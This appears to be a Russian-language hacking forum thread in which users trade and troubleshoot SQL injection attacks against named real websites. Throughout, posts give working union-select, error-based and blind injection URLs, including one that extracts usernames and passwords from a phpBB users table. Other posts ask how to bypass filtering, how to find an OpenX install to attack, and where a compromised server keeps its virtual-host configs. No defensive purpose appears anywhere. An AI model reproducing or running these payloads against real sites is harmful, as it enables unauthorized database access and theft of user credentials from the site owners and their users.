Code: site.ru/index.php?id=12 AS temp_orders ON fl_orders.Email_new = temp_orders.Email_new JOIN fl_product_or+--+ попробуй относительно этого крутить
Вот ссылка, мне не жалко но если кто-то ковырнет раньше меня то поделитесь со всеми http://www.flashloaded.com/cart/basket.php?action=Add&itemid=6587
Code: http://zurnals.maminuklubs.lv/lat/sludinajumi/?cat=-48'+union+select+1,2,3,4,5,6,7,8,9,10,concat(0x3a,version(),user(),database(),0x3a),12,13,14,15--+
почему "substring" не показывают данные? http://www.sudplanete.net/photo.php?menu=pers&no=8452+or+(1,2)=(select+count(0),concat((select+substring(table_name,1,10)+from+information_schema.tables limit 1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--+
Привет. Прочел конфиг апача, инклудятся файлы Include conf.d/*.conf, сервер redhat-linux-gnu, где по дефолту лежат конфиги виртуальных хостов?
blind делаю в адресной строке запрос php?id=11+AND+ascii(lower(substring(user(),1,1)))>115 долго очень перебирать имя юзера, можно ли через sipt ускорить перебор? каков должен быть запрос в сипт? (user(),{N1-115},1 или ?????
Помогите, пожалуйста, найти OpenX на сайте zurnals.maminuklubs.lv или он на верхнем поддомене, я уж обыскался, но не могу найти этот скрипт. Он там есть, версия 2.8.
http://www.globalresponse.org/gra.php?i=current'+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+
Code: http://www.globalresponse.org/gra.php?i=current%27+union+select+1,2,3,4,5,6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23--+ опередил А вот похенк) Code: http://www.globalresponse.org/gra.php?i=current%27+union+select+1,2,3,4,concat_ws%280x3a,username,user_password%29,6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23+from+phpbb_users+limit+1,1--+
Почему инфу не выводит? Слепая инъекция... Code: http://www.experienceegypt.info/templates/contactus.php?id=116+union+select+1,2,3,4,5,6--
_http://www.experienceegypt.info/templates/contactus.php?id=-116+union+select+1,2,version(),4,5,6,7,8,9+--+
о чём это говорит? You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- )) ORD' at line 1 недопустимые символы? или же? как только не пробывал фильтровать ответ один и тот же.. либы ошибка(фильтр) или вот это сообщение
такой вопрос: видел где то раскручивали скулю на asp?ID=15 поискав немного не нащёл реально ведь вообще? можно пример привести + хотелось бы увидеть линк на статью по этой теме если есть так же столкнулся ещё с такой проблемой... http://www.tall.com/detail.php?itemid=7565&size=454/fuck иньекция есть, 1 колонка вывод данныех недоступен( посмотрите плыз да и по первому вопросу оч нуждаюсь в ответе